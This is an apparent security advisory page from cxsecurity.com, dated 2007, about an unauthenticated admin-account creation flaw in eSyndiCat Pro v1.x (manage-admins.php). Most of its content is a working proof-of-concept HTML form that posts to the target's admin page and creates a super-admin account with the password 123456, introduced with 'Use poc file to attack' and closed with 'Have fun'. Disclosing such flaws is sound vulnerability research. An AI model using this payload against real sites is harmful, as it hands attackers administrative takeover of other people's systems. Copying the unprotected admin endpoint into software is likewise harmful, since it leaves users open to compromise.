eSyndiCat Input Validation Error Vulnerability

2007.05.25
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

eSyndiCat is Directory websystem, a product of eSyndiCat.com It has security hole allow attackers get admin and more and more. Infected version: eSyndiCat Pro v1.x Infected file: manage-admins.php Use poc file to attack: ------------------------------------------------ <p>Discovered by H2P - A member of http://vnbrain.net <form action="http://target/path/admin/manage-admins.php?action=add" method="post"> <table cellspacing="0" cellpadding="0" width="100%" class="striped"> <tr> <td width="200"><strong>Admin username:</strong></td> <td><input type="text" name="username" size="22" value="checked"/></td> </tr> <tr> <td><strong>Admin Fullname:</strong></td> <td><input type="text" name="fullname" size="22" value="Check Only"/></td> </tr> <tr> <td><strong>Admin Email:</strong></td> <td> <input type="text" name="email" size="22" value="hack2prison (at) freeprotect (dot) net [email concealed]" /></td> </tr> <tr> <td><strong>Admin password:</strong></td> <td><input type="password" name="new_pass" size="22" value="123456" /></td> </tr> <tr> <td><strong>Admin Password Confirmation:</strong></td> <td><input type="password" name="new_pass2" size="22" value="123456" /></td> </tr> <tr> <td><strong>Admin Status:</strong></td> <td><select name="status"> <option value="active" >Active</option> <option value="approval" >Approval</option> </select></td> </tr> <tr> <td><strong>Submission Notification:</strong></td> <td><input type="radio" name="submit_notif" value="1" id="lsn1" checked="checked" /><label for="lsn1">Enabled</label> <input type="radio" name="submit_notif" value="0" id="lsn0" /><label for="lsn0">Disabled</label> </td> </tr> <tr> <td><strong>Payment Notification:</strong></td> <td><input type="radio" name="payment_notif" value="1" id="lpn1" checked="checked" /><label for="lpn1">Enabled</label> <input type="radio" name="payment_notif" value="0" id="lpn0" /><label for="lpn0">Disabled</label> </td> </tr> <tr> <td class="caption" colspan="2"><strong>Admin Permissions</strong></td> </tr> <tr> <td><strong>Super Admin:</strong></td> <td><input type="radio" name="super" value="1" id="type1" checked="checked" onclick="javascript:document.getElementById('permissions').style.display ='none';" /><label for="type1">Enabled</label> <input type="radio" name="super" value="0" id="type0" onclick="javascript:document.getElementById('permissions').style.display ='block';"/><label for="type0">Disabled</label> </td> </tr> </table> <table cellspacing="0" width="100%"> <tr class="all"> <td colspan="2"><input type="submit" name="save" value="Save Changes" /> <input type="hidden" name="id" value="" /> <input type="hidden" name="action" value="add" /> </td> </tr> </table> </form> ------------------------------------------------ Have fun


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top